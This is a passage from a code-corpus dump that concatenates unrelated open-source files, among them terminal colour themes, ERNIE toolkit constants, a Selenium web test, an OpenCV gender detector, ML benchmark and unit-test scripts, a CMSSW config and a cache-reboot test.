'green': '#00aa00',
'yellow': '#ffff99',
'blue': '#0000ff',
'magenta': '#900090',
'cyan': '#27b5ac',
'white': '#efefef',
'brightBlack': '#adadad',
'brightRed': '#c10000',
'brightGreen': '#00c800',
'brightYellow': '#fff569',
'brightBlue': '#0a37ff',
'brightMagenta': '#d500d5',
'brightCyan': '#2dd0c5',
'brightWhite': '#ffffff'
},
'spyder/dark': {
'black': '#19232D',
'red': '#c80000',
'green': '#11a642',
'yellow': '#c5bb29',
'blue': '#558eff',
'magenta': '#aa00aa',
'cyan': '#20b3a7',
'white': '#ffffff',
'brightBlack': '#4b4b4b',
'brightRed': '#ef0000',
'brightGreen': '#13c24b',
'brightYellow': '#e6e13f',
'brightBlue': '#4395ff',
'brightMagenta': '#da00da',
'brightCyan': '#23cbbd',
'brightWhite': '#ffffff'
},
'zenburn': {
'black': '#3F3F3F',
'red': '#705050',
'green': '#60B48A',
'yellow': '#DFAF8F',
'blue': '#506070',
'magenta': '#DC8CC3',
'cyan': '#8CD0D3',
'white': '#DCDCCC',
'brightBlack': '#709080',
'brightRed': '#DCA3A3',
'brightGreen': '#C3BF9F',
'brightYellow': '#F0DFAF',
'brightBlue': '#94BFF3',
'brightMagenta': '#EC93D3',
'brightCyan': '#93E0E3',
'brightWhite': '#DCDCCC'
},
'solarized/light': {
'black': '#fdf6e3',
'red': '#dc322f',
'green': '#859900',
'yellow': '#b58900',
'blue': '#268bd2',
'magenta': '#6c71c4',
'cyan': '#2aa198',
'white': '#93a1a1',
'brightBlack': '#657b83',
'brightRed': '#dc322f',
'brightGreen': '#859900',
'brightYellow': '#b58900',
'brightBlue': '#268bd2',
'brightMagenta': '#6c71c4',
'brightCyan': '#2aa198',
'brightWhite': '#fdf6e3'
},
'solarized/dark': {
'black': '#002b36',
'red': '#dc322f',
'green': '#859900',
'yellow': '#b58900',
'blue': '#268bd2',
'magenta': '#6c71c4',
'cyan': '#2aa198',
'white': '#93a1a1',
'brightBlack': '#657b83',
'brightRed': '#dc322f',
'brightGreen': '#859900',
'brightYellow': '#b58900',
'brightBlue': '#268bd2',
'brightMagenta': '#6c71c4',
'brightCyan': '#2aa198',
'brightWhite': '#fdf6e3'
},
'inkpot': {
'black': '#1f1f27',
'red': '#CD5200',
'green': '#9DCD00',
'yellow': '#cd8b00',
'blue': '#87cefa',
'magenta': '#8b8bff',
'cyan': '#87FAE5',
'white': '#93a1a1',
'brightBlack': '#313131',
'brightRed': '#CD2300',
'brightGreen': '#C0CD00',
'brightYellow': '#ffcd8b',
'brightBlue': '#B9E1FA',
'brightMagenta': '#A3A3FF',
'brightCyan': '#B8FAEE',
'brightWhite': '#cfbfad'
},
'minimal': {
'black': '#ffffff',
'red': '#D22D72',
'green': '#568C3B',
'yellow': '#8A8A0F',
'blue': '#257FAD',
'magenta': '#5D5DB1',
'cyan': '#2D8F6F',
'white': '#7EA2B4',
'brightBlack': '#5A7B8C',
'brightRed': '#D22D72',
'brightGreen': '#568C3B',
'brightYellow': '#8A8A0F',
'brightBlue': '#257FAD',
'brightMagenta': '#5D5DB1',
'brightCyan': '#2D8F6F',
'brightWhite': '#EBF8FF'
},
'nightlion': {
'black': '#4c4c4c',
'red': '#bb0000',
'green': '#5fde8f',
'yellow': '#f3f167',
'blue': '#276bd8',
'magenta': '#bb00bb',
'cyan': '#00dadf',
'white': '#bbbbbb',
'brightBlack': '#555555',
'brightRed': '#ff5555',
'brightGreen': '#55ff55',
'brightYellow': '#ffff55',
'brightBlue': '#5555ff',
'brightMagenta': '#ff55ff',
'brightCyan': '#55ffff',
'brightWhite': '#ffffff'
},
'notepad++': {
'black': '#ffffff',
'red': '#CC342B',
'green': '#198844',
'yellow': '#FBA922',
'blue': '#3971ED',
'magenta': '#A36AC7',
'cyan': '#3971ED',
'white': '#C5C8C6',
'brightBlack': '#969896',
'brightRed': '#CC342B',
'brightGreen': '#198844',
'brightYellow': '#FBA922',
'brightBlue': '#3971ED',
'brightMagenta': '#A36AC7',
'brightCyan': '#3971ED',
'brightWhite': '#FFFFFF'
},
'oblivion': {
'black': '#1D1F21',
'red': '#CC6666',
'green': '#B5BD68',
'yellow': '#F0C674',
'blue': '#81A2BE',
'magenta': '#B294BB',
'cyan': '#8ABEB7',
'white': '#C5C8C6',
'brightBlack': '#969896',
'brightRed': '#CC6666',
'brightGreen': '#B5BD68',
'brightYellow': '#F0C674',
'brightBlue': '#81A2BE',
'brightMagenta': '#B294BB',
'brightCyan': '#8ABEB7',
'brightWhite': '#FFFFFF'
},
'obsidian': {
'black': '#232C31',
'red': '#2A5491',
'green': '#237986',
'yellow': '#A03B1E',
'blue': '#484D79',
'magenta': '#C59820',
'cyan': '#B02F30',
'white': '#9EA7A6',
'brightBlack': '#3F4944',
'brightRed': '#2A5491',
'brightGreen': '#237986',
'brightYellow': '#A03B1E',
'brightBlue': '#484D79',
'brightMagenta': '#C59820',
'brightCyan': '#B02F30',
'brightWhite': '#B5D8F6'
},
'pastel': {
'black': '#000000',
'red': '#c37372',
'green': '#72c373',
'yellow': '#c2c372',
'blue': '#7372c3',
'magenta': '#c372c2',
'cyan': '#72c2c3',
'white': '#d9d9d9',
'brightBlack': '#323232',
'brightRed': '#dbaaaa',
'brightGreen': '#aadbaa',
'brightYellow': '#dadbaa',
'brightBlue': '#aaaadb',
'brightMagenta': '#dbaada',
'brightCyan': '#aadadb',
'brightWhite': '#ffffff'
},
'retta': {
'black': '#000000',
'red': '#A54242',
'green': '#8C9440',
'yellow': '#de935f',
'blue': '#5F819D',
'magenta': '#85678F',
'cyan': '#5E8D87',
'white': '#969896',
'brightBlack': '#373b41',
'brightRed': '#cc6666',
'brightGreen': '#b5bd68',
'brightYellow': '#f0c674',
'brightBlue': '#81a2be',
'brightMagenta': '#b294bb',
'brightCyan': '#8abeb7',
'brightWhite': '#c5c8c6'
},
'roboticket': {
'black': '#f5f5f5',
'red': '#E64569',
'green': '#89D287',
'yellow': '#DAB752',
'blue': '#439ECF',
'magenta': '#D961DC',
'cyan': '#64AAAF',
'white': '#B3B3B3',
'brightBlack': '#535353',
'brightRed': '#E4859A',
'brightGreen': '#A2CCA1',
'brightYellow': '#E1E387',
'brightBlue': '#6FBBE2',
'brightMagenta': '#E586E7',
'brightCyan': '#96DCDA',
'brightWhite': '#DEDEDE'
},
'sublime-monokai/extended': {
'black': '#222222',
'red': '#dc2566',
'green': '#8fc029',
'yellow': '#d4c96e',
'blue': '#55bcce',
'magenta': '#9358fe',
'cyan': '#56b7a5',
'white': '#f8f8f2',
'brightBlack': '#76715e',
'brightRed': '#fa2772',
'brightGreen': '#a7e22e',
'brightYellow': '#e7db75',
'brightBlue': '#66d9ee',
'brightMagenta': '#ae82ff',
'brightCyan': '#66efd5',
'brightWhite': '#f9f8f5'
},
'vibrant-ink': {
'black': '#191919',
'red': '#d00e18',
'green': '#138034',
'yellow': '#ffcb3e',
'blue': '#006bb3',
'magenta': '#6b2775',
'cyan': '#384564',
'white': '#ededed',
'brightBlack': '#5d504a',
'brightRed': '#f07e18',
'brightGreen': '#b1d130',
'brightYellow': '#fff120',
'brightBlue': '#4fc2fd',
'brightMagenta': '#de0071',
'brightCyan': '#5d504a',
'brightWhite': '#ffffff'
}
}
|
erniekit/common/rule.py | PaddlePaddle/LARK | 1,552 | 30553 | <filename>erniekit/common/rule.py
# -*- coding: utf-8 -*-
"""
some rule
"""
class MaxTruncation(object):
"""MaxTruncation:超长截断规则
"""
KEEP_HEAD = 0 # 从头开始到最大长度截断
KEEP_TAIL = 1 # 从头开始到max_len-1的位置截断,末尾补上最后一个id(词或字)
KEEP_BOTH_HEAD_TAIL = 2 # 保留头和尾两个位置,然后按keep_head方式截断
class EmbeddingType(object):
"""EmbeddingType:文本数据需要转换的embedding类型:no_emb , ernie_emb
"""
NONE_EMBEDDING = 0 # 不需要emb
ERNIE_EMBEDDING = 1 # 用ernie生成emb
FLUID_EMBEDDING = 2 # 使用fluid的op生成emb
class FluidDataType(object):
""" FluidDataType data struct wrapper """
def __init__(self, shape, dtype, lod_level, name=None):
self.shape = shape
self.dtype = dtype
self.lod_level = lod_level
self.name = name
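    # Illustrative instantiation (the field name and shape are assumptions, not
    # taken from the original code):
    #   FluidDataType(shape=[-1, 512], dtype='int64', lod_level=0, name='src_ids')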
class WordPieceType(object):
"""字词混合切分模式下,每个token的type"""
SINGLE_TOKEN = 0 # 单个字
WORD_START = 1 # 词首字符
WORD_INCLUDE = 2 # 词中间字符
class DataShape(object):
"""DataShape:输入的数据类型
"""
STRING = "string" # string
INT = "int" # int64
FLOAT = "float" # float32
class InstanceName(object):
"""InstanceName:一些常用的命名
"""
RECORD_ID = "id"
RECORD_EMB = "emb"
SRC_IDS = "src_ids"
WORDSEG_IDS = "wordseg_ids"
MASK_IDS = "mask_ids"
LOSS_MASK = "loss_mask"
SEQ_LENS = "seq_lens"
SENTENCE_IDS = "sent_ids"
POS_IDS = "pos_ids"
TASK_IDS = "task_ids"
PHONETIC_A_IDS = "phonetic_a_ids"
PHONETIC_B_IDS = "phonetic_b_ids"
GLYPH_A_IDS = "glyph_a_ids"
GLYPH_B_IDS = "glyph_b_ids"
GLYPH_C_IDS = "glyph_c_ids"
GLYPH_D_IDS = "glyph_d_ids"
REL_POS_IDS="rel_pos_ids"
DEEP_IDS = "deep_ids"
BEG_IDS = "beg_ids"
END_IDS = "end_ids"
    # keys related to generation training
TGT_LABEL = "tgt_label"
TGT_POS = "tgt_pos"
    # keys related to generation decoding
TGT_SRC_IDS = "tgt_src_ids"
TGT_POS_IDS = "tgt_pos_ids"
INIT_SCORES = "init_scores"
PARENT_IDX = "parent_idx"
TGT_MASK_IDS = 'tgt_mask_ids'
DATA_IDS = 'data_ids'
    # keys related to multi-turn dialogue
ROLE_IDS = "role_ids"
TURN_IDS = "turn_ids"
TGT_PHONETIC_A_IDS = "tgt_phonetic_a_ids"
TGT_PHONETIC_B_IDS = "tgt_phonetic_b_ids"
TGT_GLYPH_A_IDS = "tgt_glyph_a_ids"
TGT_GLYPH_B_IDS = "tgt_glyph_b_ids"
TGT_GLYPH_C_IDS = "tgt_glyph_c_ids"
TGT_GLYPH_D_IDS = "tgt_glyph_d_ids"
    # keys related to the seq2seq label field
TRAIN_LABEL_SRC_IDS = "train_label_src_ids"
TRAIN_LABEL_MASK_IDS = "train_label_mask_ids"
TRAIN_LABEL_SEQ_LENS = "train_label_seq_lens"
INFER_LABEL_SRC_IDS = "infer_label_src_ids"
INFER_LABEL_MASK_IDS = "infer_label_mask_ids"
INFER_LABEL_SEQ_LENS = "infer_label_seq_lens"
    # keys related to term rank
TERM_POS = "term_pos"
TERM_TOKENS_NUMS = "term_tokens_nums"
TERM_INDEX = "term_index"
TERM_PAIRS = "term_pairs"
TERM_DIFFS = "term_diffs"
    SEQUENCE_EMB = "sequence_output"  # token-level embedding
    POOLED_EMB = "pooled_output"  # sentence-level embedding
    TARGET_FEED = "target_feed"  # needed when saving the model: the variables (tensor or variable) fed as input at prediction time
    TARGET_FEED_NAMES = "target_feed_name"  # needed when saving the model: the names and order of the prediction-time input variables
    TARGET_PREDICTS = "target_predicts"  # needed when saving the model: the final outputs produced at prediction time
    PREDICT_RESULT = "predict_result"  # prediction results passed around during training
    STUDENT_PREDICT_RESULT = "student_predict_result"  # prediction results passed around during training
    TEACHER_PREDICT_RESULT = "teacher_predict_result"  # prediction results passed around during training
LABEL = "label" # label
TEACHER_CE_LOSS = "teacher_ce_loss"
STUDENT_CE_LOSS = "student_ce_loss"
DISTILL_LOSS = "distill_loss"
PRED_LOSS = "pred_loss"
LOSS = "loss" # loss
# CRF_EMISSION = "crf_emission" # crf_emission
TRAINING = "training" # 训练过程
EVALUATE = "evaluate" # 评估过程
TEST = "test" # 测试过程
SAVE_INFERENCE = "save_inference" # 保存inference model的过程
INFERENCE = "inference" # 预测过程
STEP = "steps"
SPEED = "speed"
TIME_COST = "time_cost"
GPU_ID = "gpu_id"
FILE_CHECKPOINTS = "checkpoints"
FILE_INFERENCE_MODEL = "inference_model"
TYPE_PY_READER = "py_reader"
TYPE_DATA_LOADER = "data_loader"
    # ERNIE-VIL related keys
IMAGE_PIXEL_IDS = "image_pixel_ids"
IMAGE_POSITION = "image_position"
IMAGE_TAG_IDS = "image_tag_ids"
TEXT_INDEX = "text_index"
IMAGE_INDEX = "image_index"
POS_INDEX = "pos_index"
    # ERNIE-Layout related keys
POS_2D_IDS = "pos_2d_ids"
SEGMENT_IDS = "segment_ids"
    # DynaBERT related keys
HIDDEN_LAYERS = "hidden_layers"
LOGIT = "logit"
    # prompt related keys
LABEL_MAP_IDS = "label_map_ids"
LABEL_TEXT_IDS = "label_text_ids"
BATCH_SIZE = "batch_size"
MAX_SEQ_LEN = "max_seq_len"
class FieldLength(object):
"""一个field在序列化成field_id_list的时候,占的长度是多少
"""
CUSTOM_TEXT_FIELD = 3
ERNIE_TEXT_FIELD = 6
SINGLE_SCALAR_FIELD = 1
ARRAY_SCALAR_FIELD = 2
BASIC_TEXT_FIELD = 2
GENERATE_LABEL_FIELD = 6
ERNIE_TERM_RANK_TEXT_FIELD = 9
ERNIT_TERM_RANK_LABEL_FIELD = 4
# ERNIE-VIL RELATED VARIABLES
ERNIEVIL_IMAGE_PIXEL_FIELD = 1
ERNIEVIL_IMAGE_TAGS_FIELD = 1
# ERNIE-Layout RELATED VARIABLES
ERNIE_LAYOUT_SEQLABEL_FIELD = 10
class FleetMode(object):
"""Fleet模式
"""
NO_FLEET = "NO_FLEET"
CPU_MODE = "CPU"
GPU_MODE = "GPU"
class UploadModelType(object):
"""模型上传的类型"""
UPLOAD_HDFS_IMMEDIATE = "immediate" # 实时上传到HDFS
UPLOAD_HDFS_LAST_TIME = "last_time" # 训练结束之后由paddlecloud平台进行集中上传
class StoreModelType(object):
"""模型保存方式的类型"""
STORE_HDFS = "hadoop" # 保存到hadoop集群上
STORE_IREPO = "irepo" # 保存到irepo模型仓库中
class EncryptType(object):
"""模型加密的方式"""
ENCRYPT_NONE = None # 不加密
ENCRYPT_MEMORY = "memory" # 内存加密
ENCRYPT_FILE = "file" # 文件加密
class InferenceRetcode(object):
""" 预测服务返回码 """
RET_OK = 200
LOAD_JSON_FAILED = 201
MISSING_FIELD = 202
class GraphMode(object):
"""图模式
"""
#动态图
DYGRAPH = "dynamic"
#静态图
STATIC = "static"
|
scripts/selenium/test.py | Mlrobinson1993/trustroots | 377 | 30557 | #!/usr/bin/env python
from browsers import browsers
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.support.wait import WebDriverWait
from selenium.common.exceptions import TimeoutException
import time
import sys
import re
import signal
print 'Trustroots Selenium tests'
# URL is passed as an argument
if len(sys.argv) > 1:
test_url = sys.argv[1]
# Default to localhost
else:
test_url = 'http://localhost:3000/'
print 'Testing URL: ' + test_url
class Main:
def __init__(self):
try:
from config_browserstack import browserstack_url
no_browserstack = 0
except ImportError:
no_browserstack = 1
no_browserstack = 1
for cap in browsers:
if cap['env'] == 'remote' and no_browserstack:
if no_browserstack == 1:
print 'sorry, no browserstack'
no_browserstack = 2 # Should be cleaner
else:
if cap['env'] == 'local':
driver = getattr(webdriver, cap['browser'])()
else:
print 'launching', cap
driver = webdriver.Remote(
command_executor=browserstack_url,
desired_capabilities=cap
)
try:
self.t = TestSuite(driver, cap, test_url)
except:
print sys.exc_info()
finally:
if cap['env'] == 'remote':
driver.quit()
class TestSuite:
def __init__(self, driver, cap, url):
self.wait = WebDriverWait(driver, 15)
self.driver = driver
self.cap = cap
self.url = url
def signal_handler(signal, frame):
print('Handling Ctrl+C!')
if hasattr(self, 'driver') and self.driver:
print 'Trying driver.quit()'
self.driver.quit()
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
try:
self.run_tests()
except:
print cap
print sys.exc_info()
def run_tests(self):
self.username = 'tester' + str(time.time())[5:10]
self.email = self.username + '@example.tld'
self.password = '<PASSWORD>'
self.driver.get(self.url)
self.test_signup()
self.test_home_map()
self.test_logout_signin()
self.test_logout_signin_email()
def test_signup(self):
if not "Trustroots" in self.driver.title:
raise Exception("Unable to load page!")
self._wait_and_click(self.driver.find_element_by_css_selector, 'a.btn-home-signup')
if not 'Trustroots' in self.driver.title:
raise Exception("Unable to load page!")
self._wait_and_click(self.driver.find_element_by_id, 'firstName')
self.driver.find_element_by_id('firstName').send_keys('Tester')
self.driver.find_element_by_id('lastName').send_keys('Tester')
self.driver.find_element_by_id('username').send_keys(self.username)
self.driver.find_element_by_id('email').send_keys(self.email)
self.driver.find_element_by_id('password').send_keys(self.password)
self._wait_and_click(self.driver.find_element_by_css_selector, 'button[type="submit"]')
self._wait_and_click(self.driver.find_element_by_id, 'signup-edit')
def test_logout_signin(self):
self.driver.get(self.url + 'auth/signout')
self._wait_and_click(self.driver.find_element_by_css_selector, 'a.btn-home-login')
self.driver.find_element_by_id('username').send_keys(self.username)
self.driver.find_element_by_id('password').send_keys(self.password)
self._wait_and_click(self.driver.find_element_by_css_selector, 'button[type="submit"]')
def test_logout_signin_email(self):
self.driver.get(self.url + 'auth/signout')
self._wait_and_click(self.driver.find_element_by_css_selector, 'a.btn-home-login')
self.driver.find_element_by_id('username').send_keys(self.email)
self.driver.find_element_by_id('password').send_keys(self.password)
self._wait_and_click(self.driver.find_element_by_css_selector, 'button[type="submit"]')
def test_home_map(self):
self._wait_and_click(self.driver.find_element_by_css_selector, 'a.navbar-brand')
self.driver.find_element_by_id('search-query').send_keys('Berlin' + Keys.RETURN)
def _assert_contains_regexp(self, regexp):
text_found = re.search(regexp, self.driver.page_source)
print text_found
assert text_found != None
def _wait_and_click_id(self, _id, pause=0):
self._wait_and_click(self.driver.find_element_by_id, _id, pause)
def _wait_and_click(self, func, param, pause=0):
if pause == 0:
self.wait.until(lambda _: func(param).is_displayed())
else:
self._sleep(pause)
func(param).click()
m = Main()
|
demo/utils/genderdetect.py | TommyZihao/MMGEN-FaceStylor | 122 | 30562 | <reponame>TommyZihao/MMGEN-FaceStylor<gh_stars>100-1000
import random
import cv2
padding = 20
MODEL_MEAN_VALUES = (78.4263377603, 87.7689143744, 114.895847746)
genderList = ['Male', 'Female']
class GenderDetection():
def __init__(self):
faceProto = 'data/opencv_face_detector.pbtxt'
faceModel = 'data/opencv_face_detector_uint8.pb'
genderProto = 'data/gender_deploy.prototxt'
genderModel = 'data/gender_net.caffemodel'
self.ans = [True, False]
self.faceNet = cv2.dnn.readNet(faceModel, faceProto)
self.genderNet = cv2.dnn.readNet(genderModel, genderProto)
def highlightFace(self, net, frame, conf_threshold=0.9):
frameOpencvDnn = frame.copy()
frameHeight = frameOpencvDnn.shape[0]
frameWidth = frameOpencvDnn.shape[1]
blob = cv2.dnn.blobFromImage(frameOpencvDnn, 1.0, (300, 300),
[104, 117, 123], True, False)
net.setInput(blob)
detections = net.forward()
faceBoxes = []
for i in range(detections.shape[2]):
confidence = detections[0, 0, i, 2]
if confidence > conf_threshold:
x1 = int(detections[0, 0, i, 3] * frameWidth)
y1 = int(detections[0, 0, i, 4] * frameHeight)
x2 = int(detections[0, 0, i, 5] * frameWidth)
y2 = int(detections[0, 0, i, 6] * frameHeight)
faceBoxes.append([x1, y1, x2, y2])
cv2.rectangle(frameOpencvDnn, (x1, y1), (x2, y2), (0, 255, 0),
int(round(frameHeight / 150)), 8)
return frameOpencvDnn, faceBoxes
# opencv
def detect(self, img):
try:
resultImg, faceBoxes = self.highlightFace(self.faceNet, img)
if not faceBoxes:
return self.ans[random.randint(0, 1)]
for faceBox in faceBoxes:
if (max(faceBox) > 1024):
continue
face = img[max(0, faceBox[1] -
padding):min(faceBox[3] +
padding, img.shape[0] - 1),
max(0, faceBox[0] -
padding):min(faceBox[2] +
padding, img.shape[1] - 1)]
blob = cv2.dnn.blobFromImage(face,
1.0, (227, 227),
MODEL_MEAN_VALUES,
swapRB=False)
self.genderNet.setInput(blob)
genderPreds = self.genderNet.forward()
gender = genderList[genderPreds[0].argmax()]
if (gender == 'Female'):
return True
else:
return False
except: # isort:skip # noqa
return self.ans[random.randint(0, 1)]
|
fclib/tests/test_dcnn.py | barrosm/forecasting | 2,276 | 30566 | <gh_stars>1000+
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
from fclib.models.dilated_cnn import create_dcnn_model
def test_create_dcnn_model():
mod0 = create_dcnn_model(seq_len=1) # default args
assert mod0 is not None
mod1 = create_dcnn_model(
seq_len=1, n_dyn_fea=1, n_outputs=2, n_dilated_layers=1, kernel_size=2, dropout_rate=0.05, max_cat_id=[30, 120]
)
assert mod1 is not None
mod2 = create_dcnn_model(
seq_len=1, n_dyn_fea=1, n_outputs=2, n_dilated_layers=2, kernel_size=2, dropout_rate=0.05, max_cat_id=[30, 120]
)
assert mod2 is not None
|
Alignment/CommonAlignmentProducer/python/ALCARECOTkAlMinBias_Output_cff.py | ckamtsikis/cmssw | 852 | 30605 | <gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
# AlCaReco for track based alignment using MinBias events
OutALCARECOTkAlMinBias_noDrop = cms.PSet(
SelectEvents = cms.untracked.PSet(
SelectEvents = cms.vstring('pathALCARECOTkAlMinBias')
),
outputCommands = cms.untracked.vstring(
'keep *_ALCARECOTkAlMinBias_*_*',
'keep L1AcceptBunchCrossings_*_*_*',
'keep L1GlobalTriggerReadoutRecord_gtDigis_*_*',
'keep *_TriggerResults_*_*',
'keep DcsStatuss_scalersRawToDigi_*_*',
'keep *_offlinePrimaryVertices_*_*',
'keep *_offlineBeamSpot_*_*')
)
import copy
OutALCARECOTkAlMinBias = copy.deepcopy(OutALCARECOTkAlMinBias_noDrop)
OutALCARECOTkAlMinBias.outputCommands.insert(0, "drop *")
|
benchmarks/roberta/benchmark_tft.py | legacyai/tf-transformers | 116 | 30617 | """TFTBenchmark scripts"""
import shutil
import tempfile
import time
import tensorflow as tf
import tqdm
from datasets import load_dataset
from transformers import RobertaTokenizerFast
from tf_transformers.models import Classification_Model
from tf_transformers.models import RobertaModel as Model
_ALLOWED_DECODER_TYPES = ["keras_model", "saved_model"]
class TftBenchmark:
def __init__(self, cfg):
self.cfg = cfg
# Check compatible model type
self.model_type = cfg.benchmark.model.type
if self.model_type not in _ALLOWED_DECODER_TYPES:
raise ValueError("Unknow model type {} defined".format(self.model_type))
self.model_name = cfg.benchmark.model.name
self.tokenizer = RobertaTokenizerFast.from_pretrained(self.model_name)
self.temp_dir = tempfile.mkdtemp()
def load_and_batch_dataset(self):
"""Load TF dataset"""
cfg = self.cfg
tokenizer = self.tokenizer
# Load from hydra config
dataset_name = cfg.benchmark.data.name
take_sample = cfg.benchmark.data.take_sample
batch_size = cfg.benchmark.data.batch_size
max_length = cfg.benchmark.data.max_length
dataset = load_dataset(dataset_name, split="test")
if take_sample:
dataset = dataset.select(range(50))
# Add summarize: with text
self.dataset = dataset
dataset = dataset.map(
lambda e: tokenizer(e["text"], truncation=True, padding=True, max_length=max_length),
batched=True,
)
dataset.set_format(type="tensorflow", columns=["input_ids"])
features = {
x: tf.cast(dataset[x], dtype=tf.int32).to_tensor(default_value=0, shape=[None, max_length])
for x in ["input_ids"]
}
features['input_mask'] = tf.ones_like(features['input_ids'])
features['input_type_ids'] = tf.zeros_like(features['input_ids'])
tfdataset = tf.data.Dataset.from_tensor_slices((features)).batch(batch_size)
# Convert the whole dataset to a list so that data-loading latency is excluded
# from the model performance measurement
# (batch_dataset, batch_size)
batched_datasets = [(batch_dataset, batch_dataset['input_ids'].shape[0]) for batch_dataset in tfdataset]
return batched_datasets
def _load_keras_model(self):
"""Load using TextDecoder KerasModel"""
def classifier_fn(model):
def _classifier_fn(inputs):
return model(inputs)
return _classifier_fn
model_name = self.cfg.benchmark.model.name
# Load Auto Regressive Version
model = Model.from_pretrained(model_name=model_name)
model = Classification_Model(model, num_classes=2)
model = model.get_model()
return classifier_fn(model)
def _load_saved_model(self):
"""Load using TextDecoder saved_model"""
def classifier_fn():
model = self.loaded.signatures['serving_default']
def _classifier_fn(inputs):
return model(**inputs)
return _classifier_fn
model_name = self.cfg.benchmark.model.name
model = Model.from_pretrained(model_name=model_name)
model = Classification_Model(model, num_classes=2)
model = model.get_model()
# Save as saved_model
model.save_serialized(self.temp_dir, overwrite=True)
# Load as saved_model
del model
self.loaded = tf.saved_model.load(self.temp_dir)
return classifier_fn()
def load_model_classifier_fn(self):
"""Load Model"""
if self.model_type == "keras_model":
classifier_fn = self._load_keras_model()
if self.model_type == "saved_model":
classifier_fn = self._load_saved_model()
return classifier_fn
def run(self):
#### Load classifier function
classifier_fn = self.load_model_classifier_fn()
print("Classifier function loaded successfully")
#### Load dataset
batched_datasets = self.load_and_batch_dataset()
print("Dataset loaded succesfully")
import gc
gc.collect()
#### Run classifier function
# Sample batch (to avoid first time compilation time)
sample_batch_inputs, _ = batched_datasets[0]
outputs = classifier_fn(sample_batch_inputs)
slines = 0
start_time = time.time()
for (batch_inputs, batch_size) in tqdm.tqdm(batched_datasets, unit="batch "):
outputs = classifier_fn(batch_inputs) # noqa
slines += batch_size
end_time = time.time()
shutil.rmtree(self.temp_dir)
time_taken = end_time - start_time
samples_per_second = slines / time_taken
return {"model_type": self.model_type, "time_taken": time_taken, "samples_per_second": samples_per_second}
|
test/functional/tests/initialize/test_clean_reboot.py | Ostrokrzew/open-cas-linux | 139 | 30623 | #
# Copyright(c) 2020-2021 Intel Corporation
# SPDX-License-Identifier: BSD-3-Clause-Clear
#
import os
import pytest
from api.cas import casadm
from api.cas.cache_config import CacheMode
from core.test_run import TestRun
from storage_devices.disk import DiskTypeSet, DiskType, DiskTypeLowerThan
from test_tools.dd import Dd
from test_tools.disk_utils import Filesystem
from test_utils.filesystem.file import File
from test_utils.os_utils import drop_caches, DropCachesMode, sync
from test_utils.size import Size, Unit
mount_point = "/mnt/test"
@pytest.mark.require_disk("cache", DiskTypeSet([DiskType.optane, DiskType.nand]))
@pytest.mark.require_disk("core", DiskTypeLowerThan("cache"))
@pytest.mark.parametrizex("cache_mode", CacheMode)
@pytest.mark.parametrizex("filesystem", Filesystem)
@pytest.mark.parametrizex("reboot_type", ["soft", "hard"])
@pytest.mark.require_plugin("power_control")
def test_load_after_clean_shutdown(reboot_type, cache_mode, filesystem):
"""
title: Planned system shutdown test.
description: Test for data consistency after clean system shutdown.
pass_criteria:
- DUT should reboot successfully.
- Checksum of file on core device should be the same before and after reboot.
"""
with TestRun.step("Prepare CAS device."):
cache_disk = TestRun.disks['cache']
cache_disk.create_partitions([Size(1, Unit.GibiByte)])
cache_dev = cache_disk.partitions[0]
core_dev = TestRun.disks['core']
cache = casadm.start_cache(cache_dev, cache_mode, force=True)
core = cache.add_core(core_dev)
core.create_filesystem(filesystem, blocksize=int(Size(1, Unit.Blocks4096)))
core.mount(mount_point)
with TestRun.step("Create file on cache and count its checksum."):
test_file = File(os.path.join(mount_point, "test_file"))
Dd()\
.input("/dev/zero")\
.output(test_file.full_path)\
.block_size(Size(1, Unit.KibiByte))\
.count(1024)\
.run()
test_file.refresh_item()
test_file_md5 = test_file.md5sum()
sync()
drop_caches(DropCachesMode.ALL)
with TestRun.step("Reset platform."):
if reboot_type == "soft":
TestRun.executor.reboot()
else:
power_control = TestRun.plugin_manager.get_plugin('power_control')
power_control.power_cycle()
with TestRun.step("Load cache."):
casadm.load_cache(cache_dev)
core.mount(mount_point)
with TestRun.step("Check file md5sum."):
test_file.refresh_item()
if test_file_md5 != test_file.md5sum():
TestRun.LOGGER.error("Checksums does not match - file is corrupted.")
else:
TestRun.LOGGER.info("File checksum is correct.")
with TestRun.step("Remove test file."):
test_file.remove()
|
ml-models-analyses/readahead-mixed-workload/kmlparsing.py | drewscottt/kernel-ml | 167 | 30651 | <filename>ml-models-analyses/readahead-mixed-workload/kmlparsing.py<gh_stars>100-1000
#
# Copyright (c) 2019-2021 <NAME>
# Copyright (c) 2021-2021 <NAME>
# Copyright (c) 2021-2021 <NAME>
# Copyright (c) 2021-2021 <NAME>
# Copyright (c) 2020-2021 <NAME>
# Copyright (c) 2020-2021 <NAME>
# Copyright (c) 2019-2021 <NAME>
# Copyright (c) 2019-2021 Stony Brook University
# Copyright (c) 2019-2021 The Research Foundation of SUNY
#
# You can redistribute it and/or modify it under the terms of the Apache License,
# Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0).
#
from collections import defaultdict
import re
import sys
import os
def find_avg_faults(time_values):
x = []
y = []
for vals in time_values:
t_delta = vals[0]
maj_faults = vals[1]
avg = maj_faults / t_delta
prev = x[-1] if len(x) else 0
x.append(prev + t_delta)
y.append(avg)
return x, y
def avg(data):
total = 0
for duration, x in data:
total += x
return total/len(data)
def weighted_avg(data):
time = 0
total = 0
for duration, x in data:
time += duration
total += duration * x
return total/time
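# Example (illustrative): weighted_avg([(2.0, 10.0), (1.0, 40.0)]) == (2*10 + 1*40) / 3 == 20.0,
# i.e. each (duration, value) sample is weighted by how long it lasted.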
def parse_bench_time_values(values_dict, fn, workloads):
start = re.compile(r'\tCommand being timed: "\S+ --benchmarks=(\w+)')
elap = re.compile(r'\tElapsed \(wall clock\) time \(h:mm:ss or m:ss\): (\d+):([\d\.]+)')
major = re.compile(r'\tMajor \(requiring I/O\) page faults: (\d+)')
minor = re.compile(r'\tMinor \(reclaiming a frame\) page faults: (\d+)')
inputs = re.compile(r'\tFile system inputs: (\d+)')
outputs = re.compile(r'\tFile system outputs: (\d+)')
end = re.compile(r'\tExit status: \d+')
with open(fn) as f:
for line in f.readlines():
match = start.match(line)
if match:
curr_workload = match.group(1)
load_set = set(workloads)
load_set.remove(curr_workload)
other_workload = load_set.pop()
workload = values_dict[(curr_workload, other_workload)]
data = []
match = elap.match(line)
if match:
sec = 60 * int(match.group(1))
